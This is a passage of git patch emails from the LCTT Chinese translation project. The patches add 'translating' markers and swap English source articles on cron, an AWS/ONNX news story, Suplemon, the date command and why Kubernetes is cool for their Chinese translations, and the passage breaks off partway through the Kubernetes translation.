Image by : [Internet Archive Book Images][15]. Modified by Opensource.com. [CC BY-SA 4.0][16] -One of the challenges (among the many advantages) of being a sysadmin is running tasks when you'd rather be sleeping. For example, some tasks (including regularly recurring tasks) need to run overnight or on weekends, when no one is expected to be using computer resources. I have no time to spare in the evenings to run commands and scripts that have to operate during off-hours. And I don't want to have to get up at oh-dark-hundred to start a backup or major update. +作为系统管理员的一个挑战(也是众多优势之一)就是在你想睡觉时如何让任务运行。例如,一些任务(包括定期循环的作业)需要整夜或每逢周末运行,当没人想占用计算机资源时。晚上我没有空闲时间去运行在非高峰时间必须运行的命令和脚本。我也不想摸黑起床,进行备份和主更新。 -Instead, I use two service utilities that allow me to run commands, programs, and tasks at predetermined times. The [cron][17] and at services enable sysadmins to schedule tasks to run at a specific time in the future. The at service specifies a one-time task that runs at a certain time. The cron service can schedule tasks on a repetitive basis, such as daily, weekly, or monthly. +与之代替的是,我用了两个能够在既定时间运行命令,程序,任务的服务实用程序。[cron][17] 和 at 服务能够让系统管理雨在未来特定时间内运行计划任务。at 服务指定一个在特定时间运行的一次性任务。cron服务可在重复的基础上调度任务,如每天,每周或每月。 -In this article, I'll introduce the cron service and how to use it. +在本文中我将会介绍 cron 服务以及如何使用。 -### Common (and uncommon) cron uses +### cron 的常见(和不常见)用法 I use the cron service to schedule obvious things, such as regular backups that occur daily at 2 a.m. I also use it for less obvious things. From b3ca15cde48eda38a116992e866e94497739c55d Mon Sep 17 00:00:00 2001 From: XiatianSummer Date: Thu, 7 Dec 2017 23:17:34 +0800 Subject: [PATCH 0394/1627] Update 20170607 Why Car Companies Are Hiring Computer Security Experts.md Request for translating --- ...07 Why Car Companies Are Hiring Computer Security Experts.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md index 4a7d23e5f0..f67a692647 100644 --- a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md +++ b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md @@ -1,3 +1,5 @@ +Translating by XiatianSummer + Why Car Companies Are Hiring Computer Security Experts ============================================================ From ad6b4d26b1d5eda405208e277738f47dd0b0bd93 Mon Sep 17 00:00:00 2001 From: erlinux Date: Fri, 8 Dec 2017 01:01:08 +0800 Subject: [PATCH 0395/1627] Translating By erlinux --- sources/tech/20171010 Operating a Kubernetes network.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171010 Operating a Kubernetes network.md b/sources/tech/20171010 Operating a Kubernetes network.md index 9c85e9aa70..abac12f718 100644 --- a/sources/tech/20171010 Operating a Kubernetes network.md +++ b/sources/tech/20171010 Operating a Kubernetes network.md @@ -1,3 +1,4 @@ +**translating by [erlinux](https://github.com/erlinux)** Operating a Kubernetes network ============================================================ From 9e786f23fccc355b44686be74067d892626bd2d2 Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 8 Dec 2017 08:53:20 +0800 Subject: [PATCH 0396/1627] translated --- ...Help Build ONNX Open Source AI Platform.md | 78 ------------------- ...Help Build ONNX Open Source AI Platform.md | 76 ++++++++++++++++++ 2 files changed, 76 insertions(+), 78 deletions(-) delete mode 100644 sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md create mode 100644 translated/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md diff --git a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md deleted file mode 100644 index 1e9424178e..0000000000 --- a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md +++ /dev/null @@ -1,78 +0,0 @@ -translating---geekpi - -AWS to Help Build ONNX Open Source AI Platform -============================================================ -![onnx-open-source-ai-platform](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-onnx-1.jpg) - - -Amazon Web Services has become the latest tech firm to join the deep learning community's collaboration on the Open Neural Network Exchange, recently launched to advance artificial intelligence in a frictionless and interoperable environment. Facebook and Microsoft led the effort. - -As part of that collaboration, AWS made its open source Python package, ONNX-MxNet, available as a deep learning framework that offers application programming interfaces across multiple languages including Python, Scala and open source statistics software R. - -The ONNX format will help developers build and train models for other frameworks, including PyTorch, Microsoft Cognitive Toolkit or Caffe2, AWS Deep Learning Engineering Manager Hagay Lupesko and Software Developer Roshani Nagmote wrote in an online post last week. It will let developers import those models into MXNet, and run them for inference. - -### Help for Developers - -Facebook and Microsoft this summer launched ONNX to support a shared model of interoperability for the advancement of AI. Microsoft committed its Cognitive Toolkit, Caffe2 and PyTorch to support ONNX. - -Cognitive Toolkit and other frameworks make it easier for developers to construct and run computational graphs that represent neural networks, Microsoft said. - -Initial versions of [ONNX code and documentation][4] were made available on Github. - -AWS and Microsoft last month announced plans for Gluon, a new interface in Apache MXNet that allows developers to build and train deep learning models. - -Gluon "is an extension of their partnership where they are trying to compete with Google's Tensorflow," observed Aditya Kaul, research director at [Tractica][5]. - -"Google's omission from this is quite telling but also speaks to their dominance in the market," he told LinuxInsider. - -"Even Tensorflow is open source, and so open source is not the big catch here -- but the rest of the ecosystem teaming up to compete with Google is what this boils down to," Kaul said. - -The Apache MXNet community earlier this month introduced version 0.12 of MXNet, which extends Gluon functionality to allow for new, cutting-edge research, according to AWS. Among its new features are variational dropout, which allows developers to apply the dropout technique for mitigating overfitting to recurrent neural networks. - -Convolutional RNN, Long Short-Term Memory and gated recurrent unit cells allow datasets to be modeled using time-based sequence and spatial dimensions, AWS noted. - -### Framework-Neutral Method - -"This looks like a great way to deliver inference regardless of which framework generated a model," said Paul Teich, principal analyst at [Tirias Research][6]. - -"This is basically a framework-neutral way to deliver inference," he told LinuxInsider. - -Cloud providers like AWS, Microsoft and others are under pressure from customers to be able to train on one network while delivering on another, in order to advance AI, Teich pointed out. - -"I see this as kind of a baseline way for these vendors to check the interoperability box," he remarked. - -"Framework interoperability is a good thing, and this will only help developers in making sure that models that they build on MXNet or Caffe or CNTK are interoperable," Tractica's Kaul pointed out. - -As to how this interoperability might apply in the real world, Teich noted that technologies such as natural language translation or speech recognition would require that Alexa's voice recognition technology be packaged and delivered to another developer's embedded environment. - -### Thanks, Open Source - -"Despite their competitive differences, these companies all recognize they owe a significant amount of their success to the software development advancements generated by the open source movement," said Jeff Kaplan, managing director of [ThinkStrategies][7]. - -"The Open Neural Network Exchange is committed to producing similar benefits and innovations in AI," he told LinuxInsider. - -A growing number of major technology companies have announced plans to use open source to speed the development of AI collaboration, in order to create more uniform platforms for development and research. - -AT&T just a few weeks ago announced plans [to launch the Acumos Project][8] with TechMahindra and The Linux Foundation. The platform is designed to open up efforts for collaboration in telecommunications, media and technology.  -![](https://www.ectnews.com/images/end-enn.gif) - --------------------------------------------------------------------------------- - -via: https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html - -作者:[ David Jones ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html#searchbyline -[1]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html# -[2]:https://www.linuxinsider.com/perl/mailit/?id=84971 -[3]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html -[4]:https://github.com/onnx/onnx -[5]:https://www.tractica.com/ -[6]:http://www.tiriasresearch.com/ -[7]:http://www.thinkstrategies.com/ -[8]:https://www.linuxinsider.com/story/84926.html -[9]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html diff --git a/translated/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md b/translated/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md new file mode 100644 index 0000000000..8f80387e82 --- /dev/null +++ b/translated/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md @@ -0,0 +1,76 @@ +AWS 帮助构建 ONNX 开源 AI 平台 +============================================================ +![onnx-open-source-ai-platform](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-onnx-1.jpg) + + +AWS 已经成为最近加入深度学习社区的开放神经网络交换(ONNX)协作的最新技术公司,最近在无摩擦和可互操作的环境中推出了高级人工智能。由 Facebook 和微软领头。 + +作为该合作的一部分,AWS 将其开源 Python 软件包 ONNX-MxNet 作为一个深度学习框架提供,该框架提供跨多种语言的编程接口,包括 Python、Scala 和开源统计软件 R。 + +AWS 深度学习工程经理 Hagay Lupesko 和软件开发人员 Roshani Nagmote 上周在一篇帖子中写道:ONNX 格式将帮助开发人员构建和训练其他框架的模型,包括 PyTorch、Microsoft Cognitive Toolkit 或 Caffe2。它可以让开发人员将这些模型导入 MXNet,并运行它们进行推理。 + +### 对开发者的帮助 + +今年夏天,Facebook 和微软推出了 ONNX,以支持共享模式的互操作性,来促进 AI 的发展。微软提交了其 Cognitive Toolkit、Caffe2 和 PyTorch 来支持 ONNX。 + +微软表示:Cognitive Toolkit 和其他框架使开发人员更容易构建和运行代表神经网络的计算图。 + +Github 上提供了[ ONNX 代码和文档][4]的初始版本。 + +AWS 和微软上个月宣布了在 Apache MXNet 上的一个新 Gluon 接口计划,该计划允许开发人员构建和训练深度学习模型。 + +[Tractica][5] 的研究总监 Aditya Kaul 观察到:“Gluon 是他们与 Google 的 Tensorflow 竞争的合作伙伴关系的延伸”。 + +他告诉 LinuxInsider,“谷歌在这点上的疏忽是非常明显的,但也说明了他们在市场上的主导地位。 + +Kaul 说:“甚至 Tensorflow 是开源的,所以开源在这里并不是什么大事,但这归结到底是其他生态系统联手与谷歌竞争。” + +根据 AWS 的说法,本月早些时候,Apache MXNet 社区推出了 MXNet 的 0.12 版本,它扩展了 Gluon 的功能,以便进行新的尖端研究。它的新功能之一是变分 dropout,它允许开发人员使用 dropout 技术来缓解递归神经网络中的过拟合。 + +AWS 指出:卷积 RNN、LSTM 网络和门控循环单元(GRU)允许使用基于时间的序列和空间维度对数据集进行建模。 + +### 框架中立方式 + +[Tirias Research][6] 的首席分析师 Paul Teich 说:“这看起来像是一个提供推理的好方法,而不管是什么框架生成的模型。” + +他告诉 LinuxInsider:“这基本上是一种框架中立的推理方式。” + +Teich 指出,像 AWS、微软等云提供商在客户的压力下可以在一个网络上进行训练,同时提供另一个网络,以推进人工智能。 + +他说:“我认为这是这些供应商检查互操作性的一种基本方式。” + +Tractica 的 Kaul 指出:“框架互操作性是一件好事,这会帮助开发人员确保他们建立在 MXNet 或 Caffe 或 CNTK 上的模型可以互操作。” + +至于这种互操作性如何适用于现实世界,Teich 指出,诸如自然语言翻译或语音识别等技术将要求将 Alexa 的语音识别技术打包并交付给另一个开发人员的嵌入式环境。 + +### 感谢开源 + +[ThinkStrategies][7] 的总经理 Jeff Kaplan 表示:“尽管存在竞争差异,但这些公司都认识到他们在开源运动所带来的软件开发进步方面所取得的巨大成功。” + +他告诉 LinuxInsider:“开放式神经网络交换(ONNX)致力于在人工智能方面产生类似的优势和创新。” + +越来越多的大型科技公司已经宣布使用开源技术来加快 AI 协作开发的计划,以便创建更加统一的开发和研究平台。 + +AT&T 几周前宣布了与 TechMahindra 和 Linux 基金会合作[推出 Acumos 项目][8]的计划。该平台旨在开拓电信、媒体和技术方面的合作。 +![](https://www.ectnews.com/images/end-enn.gif) + +-------------------------------------------------------------------------------- + +via: https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html + +作者:[ David Jones ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html#searchbyline +[1]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html# +[2]:https://www.linuxinsider.com/perl/mailit/?id=84971 +[3]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html +[4]:https://github.com/onnx/onnx +[5]:https://www.tractica.com/ +[6]:http://www.tiriasresearch.com/ +[7]:http://www.thinkstrategies.com/ +[8]:https://www.linuxinsider.com/story/84926.html +[9]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html From 2265f2f7c7c05eabb7cc6d010cb4ba7aaef76d07 Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 8 Dec 2017 08:56:55 +0800 Subject: [PATCH 0397/1627] translating --- ...plemon - Modern CLI Text Editor with Multi Cursor Support.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md b/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md index 2b82be93ba..6f0703cd08 100644 --- a/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md +++ b/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md @@ -1,3 +1,5 @@ +translating---geekpi + Suplemon - Modern CLI Text Editor with Multi Cursor Support ====== Suplemon is a modern text editor for CLI that emulates the multi cursor behavior and other features of [Sublime Text][1]. It's lightweight and really easy to use, just as Nano is. From 27b35221eafe662773e1a303d8e70fbffad50793 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 8 Dec 2017 09:04:31 +0800 Subject: [PATCH 0398/1627] translating by lujun9972 --- sources/tech/20171205 How to Use the Date Command in Linux.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171205 How to Use the Date Command in Linux.md b/sources/tech/20171205 How to Use the Date Command in Linux.md index 0c0f9a31aa..14d9690f1e 100644 --- a/sources/tech/20171205 How to Use the Date Command in Linux.md +++ b/sources/tech/20171205 How to Use the Date Command in Linux.md @@ -1,4 +1,5 @@ translating by lujun9972 +translating by lujun9972 How to Use the Date Command in Linux ====== In this post, we will show you some examples on how to use the date command in Linux. The date command can be used to print or set the system date and time. Using the Date Command in Linux its simple, just follow the examples and the syntax below. From bd4ad375c6d5e23ca2b96ba964a98eb225a9e63a Mon Sep 17 00:00:00 2001 From: Unknown Date: Fri, 8 Dec 2017 10:15:30 +0800 Subject: [PATCH 0399/1627] translating translating --- sources/tech/20171120 Adopting Kubernetes step by step.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171120 Adopting Kubernetes step by step.md b/sources/tech/20171120 Adopting Kubernetes step by step.md index 05faf304c8..0d10282dc7 100644 --- a/sources/tech/20171120 Adopting Kubernetes step by step.md +++ b/sources/tech/20171120 Adopting Kubernetes step by step.md @@ -1,3 +1,5 @@ +translating by aiwhj + Adopting Kubernetes step by step ============================================================ From f1105655e4dc0f38d132ef66cad7f2723bca5cd0 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Fri, 8 Dec 2017 13:25:13 +0800 Subject: [PATCH 0400/1627] Translated by qhwdw --- .../20171005 Reasons Kubernetes is cool.md | 149 ----------------- .../20171005 Reasons Kubernetes is cool.md | 150 ++++++++++++++++++ 2 files changed, 150 insertions(+), 149 deletions(-) delete mode 100644 sources/tech/20171005 Reasons Kubernetes is cool.md create mode 100644 translated/tech/20171005 Reasons Kubernetes is cool.md diff --git a/sources/tech/20171005 Reasons Kubernetes is cool.md b/sources/tech/20171005 Reasons Kubernetes is cool.md deleted file mode 100644 index e1e63e77e8..0000000000 --- a/sources/tech/20171005 Reasons Kubernetes is cool.md +++ /dev/null @@ -1,149 +0,0 @@ -Translating by qhwdw -Reasons Kubernetes is cool -============================================================ - -When I first learned about Kubernetes (a year and a half ago?) I really didn’t understand why I should care about it. - -I’ve been working full time with Kubernetes for 3 months or so and now have some thoughts about why I think it’s useful. (I’m still very far from being a Kubernetes expert!) Hopefully this will help a little in your journey to understand what even is going on with Kubernetes! - -I will try to explain some reason I think Kubenetes is interesting without using the words “cloud native”, “orchestration”, “container”, or any Kubernetes-specific terminology :). I’m going to explain this mostly from the perspective of a kubernetes operator / infrastructure engineer, since my job right now is to set up Kubernetes and make it work well. - -I’m not going to try to address the question of “should you use kubernetes for your production systems?” at all, that is a very complicated question. (not least because “in production” has totally different requirements depending on what you’re doing) - -### Kubernetes lets you run code in production without setting up new servers - -The first pitch I got for Kubernetes was the following conversation with my partner Kamal: - -Here’s an approximate transcript: - -* Kamal: With Kubernetes you can set up a new service with a single command - -* Julia: I don’t understand how that’s possible. - -* Kamal: Like, you just write 1 configuration file, apply it, and then you have a HTTP service running in production - -* Julia: But today I need to create new AWS instances, write a puppet manifest, set up service discovery, configure my load balancers, configure our deployment software, and make sure DNS is working, it takes at least 4 hours if nothing goes wrong. - -* Kamal: Yeah. With Kubernetes you don’t have to do any of that, you can set up a new HTTP service in 5 minutes and it’ll just automatically run. As long as you have spare capacity in your cluster it just works! - -* Julia: There must be a trap - -There kind of is a trap, setting up a production Kubernetes cluster is (in my experience) is definitely not easy. (see [Kubernetes The Hard Way][3] for what’s involved to get started). But we’re not going to go into that right now! - -So the first cool thing about Kubernetes is that it has the potential to make life way easier for developers who want to deploy new software into production. That’s cool, and it’s actually true, once you have a working Kubernetes cluster you really can set up a production HTTP service (“run 5 of this application, set up a load balancer, give it this DNS name, done”) with just one configuration file. It’s really fun to see. - -### Kubernetes gives you easy visibility & control of what code you have running in production - -IMO you can’t understand Kubernetes without understanding etcd. So let’s talk about etcd! - -Imagine that I asked you today “hey, tell me every application you have running in production, what host it’s running on, whether it’s healthy or not, and whether or not it has a DNS name attached to it”. I don’t know about you but I would need to go look in a bunch of different places to answer this question and it would take me quite a while to figure out. I definitely can’t query just one API. - -In Kubernetes, all the state in your cluster – applications running (“pods”), nodes, DNS names, cron jobs, and more – is stored in a single database (etcd). Every Kubernetes component is stateless, and basically works by - -* Reading state from etcd (eg “the list of pods assigned to node 1”) - -* Making changes (eg “actually start running pod A on node 1”) - -* Updating the state in etcd (eg “set the state of pod A to ‘running’”) - -This means that if you want to answer a question like “hey, how many nginx pods do I have running right now in that availabliity zone?” you can answer it by querying a single unified API (the Kubernetes API!). And you have exactly the same access to that API that every other Kubernetes component does. - -This also means that you have easy control of everything running in Kubernetes. If you want to, say, - -* Implement a complicated custom rollout strategy for deployments (deploy 1 thing, wait 2 minutes, deploy 5 more, wait 3.7 minutes, etc) - -* Automatically [start a new webserver][1] every time a branch is pushed to github - -* Monitor all your running applications to make sure all of them have a reasonable cgroups memory limit - -all you need to do is to write a program that talks to the Kubernetes API. (a “controller”) - -Another very exciting thing about the Kubernetes API is that you’re not limited to just functionality that Kubernetes provides! If you decide that you have your own opinions about how your software should be deployed / created / monitored, then you can write code that uses the Kubernetes API to do it! It lets you do everything you need. - -### If every Kubernetes component dies, your code will still keep running - -One thing I was originally promised (by various blog posts :)) about Kubernetes was “hey, if the Kubernetes apiserver and everything else dies, it’s ok, your code will just keep running”. I thought this sounded cool in theory but I wasn’t sure if it was actually true. - -So far it seems to be actually true! - -I’ve been through some etcd outages now, and what happens is - -1. All the code that was running keeps running - -2. Nothing  _new_  happens (you can’t deploy new code or make changes, cron jobs will stop working) - -3. When everything comes back, the cluster will catch up on whatever it missed - -This does mean that if etcd goes down and one of your applications crashes or something, it can’t come back up until etcd returns. - -### Kubernetes’ design is pretty resilient to bugs - -Like any piece of software, Kubernetes has bugs. For example right now in our cluster the controller manager has a memory leak, and the scheduler crashes pretty regularly. Bugs obviously aren’t good but so far I’ve found that Kubernetes’ design helps mitigate a lot of the bugs in its core components really well. - -If you restart any component, what happens is: - -* It reads all its relevant state from etcd - -* It starts doing the necessary things it’s supposed to be doing based on that state (scheduling pods, garbage collecting completed pods, scheduling cronjobs, deploying daemonsets, whatever) - -Because all the components don’t keep any state in memory, you can just restart them at any time and that can help mitigate a variety of bugs. - -For example! Let’s say you have a memory leak in your controller manager. Because the controller manager is stateless, you can just periodically restart it every hour or something and feel confident that you won’t cause any consistency issues. Or we ran into a bug in the scheduler where it would sometimes just forget about pods and never schedule them. You can sort of mitigate this just by restarting the scheduler every 10 minutes. (we didn’t do that, we fixed the bug instead, but you  _could_  :) ) - -So I feel like I can trust Kubernetes’ design to help make sure the state in the cluster is consistent even when there are bugs in its core components. And in general I think the software is generally improving over time. The only stateful thing you have to operate is etcd - -Not to harp on this “state” thing too much but – I think it’s cool that in Kubernetes the only thing you have to come up with backup/restore plans for is etcd (unless you use persistent volumes for your pods). I think it makes kubernetes operations a lot easier to think about. - -### Implementing new distributed systems on top of Kubernetes is relatively easy - -Suppose you want to implement a distributed cron job scheduling system! Doing that from scratch is a ton of work. But implementing a distributed cron job scheduling system inside Kubernetes is much easier! (still not trivial, it’s still a distributed system) - -The first time I read the code for the Kubernetes cronjob controller I was really delighted by how simple it was. Here, go read it! The main logic is like 400 lines of Go. Go ahead, read it! => [cronjob_controller.go][4] <= - -Basically what the cronjob controller does is: - -* Every 10 seconds: - * Lists all the cronjobs that exist - - * Checks if any of them need to run right now - - * If so, creates a new Job object to be scheduled & actually run by other Kubernetes controllers - - * Clean up finished jobs - - * Repeat - -The Kubernetes model is pretty constrained (it has this pattern of resources are defined in etcd, controllers read those resources and update etcd), and I think having this relatively opinionated/constrained model makes it easier to develop your own distributed systems inside the Kubernetes framework. - -Kamal introduced me to this idea of “Kubernetes is a good platform for writing your own distributed systems” instead of just “Kubernetes is a distributed system you can use” and I think it’s really interesting. He has a prototype of a [system to run an HTTP service for every branch you push to github][5]. It took him a weekend and is like 800 lines of Go, which I thought was impressive! - -### Kubernetes lets you do some amazing things (but isn’t easy) - -I started out by saying “kubernetes lets you do these magical things, you can just spin up so much infrastructure with a single configuration file, it’s amazing”. And that’s true! - -What I mean by “Kubernetes isn’t easy” is that Kubernetes has a lot of moving parts learning how to successfully operate a highly available Kubernetes cluster is a lot of work. Like I find that with a lot of the abstractions it gives me, I need to understand what is underneath those abstractions in order to debug issues and configure things properly. I love learning new things so this doesn’t make me angry or anything, I just think it’s important to know :) - -One specific example of “I can’t just rely on the abstractions” that I’ve struggled with is that I needed to learn a LOT [about how networking works on Linux][6] to feel confident with setting up Kubernetes networking, way more than I’d ever had to learn about networking before. This was very fun but pretty time consuming. I might write more about what is hard/interesting about setting up Kubernetes networking at some point. - -Or I wrote a [2000 word blog post][7] about everything I had to learn about Kubernetes’ different options for certificate authorities to be able to set up my Kubernetes CAs successfully. - -I think some of these managed Kubernetes systems like GKE (google’s kubernetes product) may be simpler since they make a lot of decisions for you but I haven’t tried any of them. - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/10/05/reasons-kubernetes-is-cool/ - -作者:[ Julia Evans][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/about -[1]:https://github.com/kamalmarhubi/kubereview -[2]:https://jvns.ca/categories/kubernetes -[3]:https://github.com/kelseyhightower/kubernetes-the-hard-way -[4]:https://github.com/kubernetes/kubernetes/blob/e4551d50e57c089aab6f67333412d3ca64bc09ae/pkg/controller/cronjob/cronjob_controller.go -[5]:https://github.com/kamalmarhubi/kubereview -[6]:https://jvns.ca/blog/2016/12/22/container-networking/ -[7]:https://jvns.ca/blog/2017/08/05/how-kubernetes-certificates-work/ diff --git a/translated/tech/20171005 Reasons Kubernetes is cool.md b/translated/tech/20171005 Reasons Kubernetes is cool.md new file mode 100644 index 0000000000..92860eac73 --- /dev/null +++ b/translated/tech/20171005 Reasons Kubernetes is cool.md @@ -0,0 +1,150 @@ +为什么 Kubernetes 很酷 +============================================================ + +在我刚开始学习 Kubernetes(大约是一年半以前吧?)时,我真的不明白为什么应该去关注它。 + +在我使用 Kubernetes 全职工作了三个多月后,我才有了一些想法为什么我应该考虑使用它了。(我距离成为一个 Kubernetes 专家还很远!)希望这篇文章对你理解 Kubernetes 能做什么会有帮助! + +我将尝试去解释我认为的对 Kubernetes 感兴趣的一些原因,而不去使用 “原生云(cloud native)”、“编排系统(orchestration)"、”容器(container)“、或者任何 Kubernetes 专用的术语 :)。我去解释的这些主要来自 Kubernetes 操作者/基础设施工程师的观点,因为,我现在的工作就是去配置 Kubernetes 和让它工作的更好。 + +我根本就不去尝试解决一些如 “你应该在你的生产系统中使用 Kubernetes 吗?”这样的问题。那是非常复杂的问题。(不仅是因为“生产系统”根据你的用途而总是有不同的要求“) + +### Kubernetes 可以让你在生产系统中运行代码而不需要去设置一台新的服务器 + +我首次被说教使用 Kubernetes 是与我的伙伴 Kamal 的下面的谈话: + +大致是这样的: + +* Kamal: 使用 Kubernetes 你可以通过几个简单的命令就能设置一台新的服务器。 + +* Julia: 我觉得不太可能吧。 + +* Kamal: 像这样,你写一个配置文件,然后应用它,这时候,你就在生产系统中运行了一个 HTTP 服务。 + +* Julia: 但是,现在我需要去创建一个新的 AWS 实例,明确地写一个 Puppet,设置服务发现,配置负载均衡,配置开发软件,并且确保 DNS 正常工作,如果没有什么问题的话,至少在 4 小时后才能投入使用。 + +* Kamal: 是的,使用 Kubernetes 你不需要做那么多事情,你可以在 5 分钟内设置一台新的 HTTP 服务,并且它将自动运行。只要你的集群中有空闲的资源它就能正常工作! + +* Julia: 这儿一定是一个”坑“ + +这里有一种陷阱,设置一个生产用 Kubernetes 集群(在我的经险中)确实并不容易。(查看 [Kubernetes The Hard Way][3] 中去开始使用时有哪些复杂的东西)但是,我们现在并不深入讨论它。 + +因此,Kubernetes 第一个很酷的事情是,它可能使那些想在生产系统中部署新开发的软件的方式变得更容易。那是很酷的事,而且它真的是这样,因此,一旦你使用一个 Kubernetes 集群工作,你真的可以仅使用一个配置文件在生产系统中设置一台 HTTP 服务(在 5 分钟内运行这个应用程序,设置一个负载均衡,给它一个 DNS 名字,等等)。看起来真的很有趣。 + +### 对于运行在生产系统中的你的代码,Kubernetes 可以提供更好的可见性和可管理性 + +在我看来,在理解 etcd 之前,你可能不会理解 Kubernetes 的。因此,让我们先讨论 etcd! + +想像一下,如果现在我这样问你,”告诉我你运行在生产系统中的每个应用程序,它运行在哪台主机上?它是否状态很好?是否为它分配了一个 DNS 名字?”我并不知道这些,但是,我可能需要到很多不同的地方去查询来回答这些问题,并且,我需要花很长的时间才能搞定。我现在可以很确定地说不需要查询,仅一个 API 就可以搞定它们。 + +在 Kubernetes 中,你的集群的所有状态 – 应用程序运行 (“pods”)、节点、DNS 名字、 cron 任务、 等等 – 都保存在一个单一的数据库中(etcd)。每个 Kubernetes 组件是无状态的,并且基本是通过下列来工作的。 + +* 从 etcd 中读取状态(比如,“分配给节点 1 的 pods 列表“) + +* 产生变化(比如,”在节点 1 上运行 pod A") + +* 更新 etcd 中的状态(比如,“设置 pod A 的状态为 ‘running’”) + +这意味着,如果你想去回答诸如 “在那个可用区域中有多少台运行 nginx 的 pods?” 这样的问题时,你可以通过查询一个统一的 API(Kubernetes API)去回答它。并且,你可以在每个其它 Kubernetes 组件上运行那个 API 去进行同样的访问。 + +这也意味着,你可以很容易地去管理每个运行在 Kubernetes 中的任何东西。如果你想这样做,你可以: + +* 为部署实现一个复杂的定制的部署策略(部署一个东西,等待 2 分钟,部署 5 个以上,等待 3.7 分钟,等等) + +* 每当推送到 github 上一个分支,自动化 [启动一个新的 web 服务器][1] + +* 监视所有你的运行的应用程序,确保它们有一个合理的内存使用限制。 + +所有你需要做的这些事情,只需要写一个告诉 Kubernetes API(“controller”)的程序就可以了。 + +关于 Kubernetes API 的其它的令人激动的事情是,你不会被局限为 Kubernetes 提供的现有功能!如果对于你想去部署/创建/监视的软件有你自己的想法,那么,你可以使用 Kubernetes API 去写一些代码去达到你的目的!它可以让你做到你想做的任何事情。 + +### 如果每个 Kubernetes 组件都“挂了”,你的代码将仍然保持运行 + +关于 Kubernetes 我承诺的(通过各种博客文章:))一件事情是,“如果 Kubernetes API 服务和其它组件”挂了“,你的代码将一直保持运行状态”。从理论上说,这是它第二件很酷的事情,但是,我不确定它是否真是这样的。 + +到目前为止,这似乎是真的! + +我已经断开了一些正在运行的 etcd,它会发生的事情是 + +1. 所有的代码继续保持运行状态 + +2. 不能做 _新的_ 事情(你不能部署新的代码或者生成变更,cron 作业将停止工作) + +3. 当它恢复时,集群将赶上这期间它错过的内容 + +这样做,意味着如果 etcd 宕掉,并且你的应用程序的其中之一崩溃或者发生其它事情,在 etcd 恢复之前,它并不能返回(come back up)。 + +### Kubernetes 的设计对 bugs 很有弹性 + +与任何软件一样,Kubernetes 有 bugs。例如,到目前为止,我们的集群控制管理器有内存泄漏,并且,调度器经常崩溃。Bugs 当然不好,但是,我发现 Kubernetes 的设计,帮助减少了许多在它的内核中的错误。 + +如果你重启动任何组件,将发生: + +* 从 etcd 中读取所有的与它相关的状态 + +* 基于那些状态(调度 pods、全部 pods 的垃圾回收、调度 cronjobs、按需部署、等等),它启动去做它认为必须要做的事情。 + +因为,所有的组件并不会在内存中保持状态,你在任何时候都可以重启它们,它可以帮助你减少各种 bugs。 + +例如,假如说,在你的控制管理器中有内存泄露。因为,控制管理器是无状态的,你可以每小时定期去启动它,或者,感觉到可能导致任何不一致的问题发生时。或者 ,在我们运行的调度器中有一个 bug,它有时仅仅是忘记了 pods 或者从来没有调度它们。你可以每隔 10 分钟来重启调度器来缓减这种情况。(我们并不这么做,而是去修复这个 bug,但是,你_可以吗_:)) + +因此,我觉得即使在它的内核组件中有 bug,我仍然可以信任 Kubernetes 